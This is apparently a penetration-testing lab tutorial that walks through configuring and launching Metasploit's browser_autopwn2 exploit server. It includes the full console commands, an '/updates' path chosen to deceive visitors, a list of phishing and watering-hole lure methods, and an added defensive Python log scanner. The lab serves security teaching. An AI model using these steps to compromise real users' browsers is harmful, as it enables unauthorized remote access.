Set up a Browser Autopwn Attack in Metasploit


Introduction

In this lab, you will delve into one of the powerful features of the Metasploit Framework: the browser autopwn attack. This type of attack involves setting up a malicious web server that, when visited by a target, automatically detects the victim's browser type and version, and then serves an exploit tailored to any discovered vulnerabilities.

We will be using the auxiliary/server/browser_autopwn2 module, an updated and more reliable version of the original browser autopwn. This lab will guide you through the process of selecting the module, configuring the necessary options, and launching the server.

Disclaimer: This lab is for educational purposes only. The techniques described should only be performed on systems you own or have explicit permission to test.

Select the auxiliary/server/browser_autopwn2 module

In this step, you will start the Metasploit Framework console and select the browser_autopwn2 module, which will be the core of our attack setup.

First, open a terminal and launch the Metasploit console. We'll use the -q flag for a "quiet" startup, which suppresses the banner for a cleaner interface.

msfconsole -q

Once the console is loaded, you will see the Metasploit prompt, which looks like msf6 >. Metasploit organizes its tools into modules. To set up our attack, we need to use the browser_autopwn2 auxiliary module. Use the use command to select it.

use auxiliary/server/browser_autopwn2

After executing the command, your prompt will change to indicate that you are now in the context of this specific module.

msf6 > use auxiliary/server/browser_autopwn2
msf6 auxiliary(server/browser_autopwn2) >

You are now ready to configure the module's options.

Set the LHOST option to your Kali IP

In this step, you will configure the LHOST option. LHOST stands for "Local Host" and it must be set to the IP address of your attacking machine (the LabEx VM). When an exploit is successful, the victim's machine will connect back to this IP address, giving you control.

First, you need to find the IP address of your LabEx VM. You can open a new terminal tab by clicking the + icon in the terminal window. In the new terminal, run the following command to display your IP address:

ip addr show eth0 | grep "inet " | awk '{print $2}' | cut -d/ -f1

You will see an output similar to this. Make sure to copy your specific IP address.

10.0.2.15

Now, go back to your original terminal where msfconsole is running. To see all the configurable options for the browser_autopwn2 module, use the show options command.

show options

You will see a list of options. Notice that LHOST is required but not yet set. Use the set command to configure LHOST with the IP address you just copied. Replace YOUR_IP_ADDRESS with your actual IP.

set LHOST YOUR_IP_ADDRESS

For example, if your IP was 10.0.2.15, the command would be:

set LHOST 10.0.2.15

Metasploit will confirm the change.

LHOST => 10.0.2.15

The LHOST is now correctly configured.

Set the URIPATH for the malicious server

In this step, you will set the URIPATH. This option defines the specific path on your web server that the victim must visit to trigger the attack. Using a non-default, discreet path can make the attack less obvious.

Just like in the previous step, you can use show options to review the current settings. You'll see that URIPATH has a default value, but we will change it to something custom.

Let's set the path to /updates. This might trick a user into thinking they are visiting a software update page. Use the set command to change the URIPATH.

set URIPATH /updates

The console will confirm that the URIPATH has been updated.

URIPATH => /updates

Now, the malicious URL that a victim would need to visit will be http://<YOUR_IP_ADDRESS>:8080/updates. Port 8080 comes from the module's SRVPORT option, which you left at its default value.

Run the module to start the web server

In this step, with all the necessary options configured, you will launch the auxiliary module. This will start a web server on your machine that listens for incoming connections from potential victims.

To start the module, simply type run in the msfconsole prompt and press Enter.

run

Metasploit will now start the server and load all the relevant browser exploits. You will see a lot of output as the server initializes. The key information to look for is the confirmation that the server has started and the URL it is using.

The output will look something like this (some details may vary):

[*] Auxiliary module running as a background job 0.
[*] Using URL: http://10.0.2.15:8080/updates
[*] Server started.
[*] Starting the payload handler...
[*] Analyzing browser info and matching exploits...
[*] Added exploit/windows/browser/adobe_flash_avm2...
[*] Added exploit/windows/browser/adobe_flash_copy_pixels...
... (many more exploits will be listed) ...

Your malicious server is now running and actively waiting for a web browser to connect to http://10.0.2.15:8080/updates (with your actual IP). When a browser connects, the server will analyze it and attempt to launch a suitable exploit.

Discuss how to lure a target to the malicious URL

In this final step, we will discuss the most critical part of this attack: getting a target to visit the malicious URL. The server is running, but it's passive; it cannot do anything until a victim browses to the link. This phase relies heavily on social engineering.

Since this lab environment does not include a separate "victim" machine, this step is purely conceptual. There are no commands to execute.

Here are some common methods used to deliver the malicious link (http://YOUR_IP_ADDRESS:8080/updates) to a target:

  • Phishing Emails: Sending a deceptive email that encourages the user to click the link. For example, the email could pretend to be a security alert, a special offer, or a password reset notification.
  • Instant Messaging: Sending the link directly to a target via a chat application, often with a message like "Hey, check out this cool site!"
  • Social Media: Posting the link on a social media platform, either publicly or in a direct message, to entice clicks.
  • Watering Hole Attack: A more advanced technique where an attacker compromises a legitimate website that the target is known to frequent. The attacker then embeds the malicious link or a redirect on that site.

If a target with a vulnerable browser visits your URL, browser_autopwn2 will automatically serve the appropriate exploit. If the exploit is successful, a "session" will be opened on your Metasploit console, giving you remote access to the victim's machine. You would see a message like [*] Session 1 opened... in your terminal.
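Seen from the defender's side, the link built in this lab has a recognisable shape: plain HTTP, an IP-literal host, a non-standard port and an update-themed path. The following added example (not part of the original lab; the log format, the keyword list and the threshold are assumptions) scores URLs from constructed proxy log lines on those four traits and reports the requests that match at least three.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed proxy log lines in an assumed format: "<time> <client> <method> <url>"
SAMPLE_LOG = """\
2024-05-01T09:12:03Z 192.0.2.21 GET http://10.0.2.15:8080/updates
2024-05-01T09:12:40Z 192.0.2.21 GET https://updates.example.com/updates
2024-05-01T09:13:05Z 192.0.2.34 GET http://198.51.100.7/index.html
2024-05-01T09:14:18Z 192.0.2.50 GET http://intranet.example.com:8080/wiki
2024-05-01T09:15:02Z 192.0.2.50 GET not-a-url
"""
STANDARD_PORTS = {80, 443}
LURE_WORDS = ("update", "patch", "install")  # assumed keyword list

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def indicators(url):
    """Return the suspicious traits found in one URL."""
    try:
        parts = urlsplit(url)
        host, port = parts.hostname, parts.port  # a bad port raises ValueError
    except ValueError:
        return []
    if not host:
        return []
    checks = {
        "ip-literal-host": is_ip_literal(host),
        "plain-http": parts.scheme == "http",
        "non-standard-port": port is not None and port not in STANDARD_PORTS,
        "update-themed-path": any(w in parts.path.lower() for w in LURE_WORDS),
    }
    return [name for name, hit in checks.items() if hit]

def scan(log_text, threshold=3):
    """Return (client, url, traits) for requests with >= threshold traits."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # skip lines that do not match the assumed format
        traits = indicators(fields[3])
        if len(traits) >= threshold:
            hits.append((fields[1], fields[3], traits))
    return hits
```

Calling scan(SAMPLE_LOG) reports only the first line; the named HTTPS host, the bare IP on port 80 and the internal wiki on 8080 each match fewer than three traits.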

Summary

Congratulations on completing this lab! You have successfully learned the fundamental steps to set up a browser autopwn attack using the Metasploit Framework.

In this lab, you have:

  • Launched the Metasploit console.
  • Selected the auxiliary/server/browser_autopwn2 module.
  • Configured the essential LHOST and URIPATH options.
  • Started the malicious web server and understood its function.
  • Discussed the social engineering techniques required to lure a target to the malicious URL.

This exercise demonstrates how powerful and automated penetration testing tools can be. It also highlights the critical importance of keeping web browsers and their plugins updated to defend against such attacks. Always remember to use this knowledge responsibly and ethically.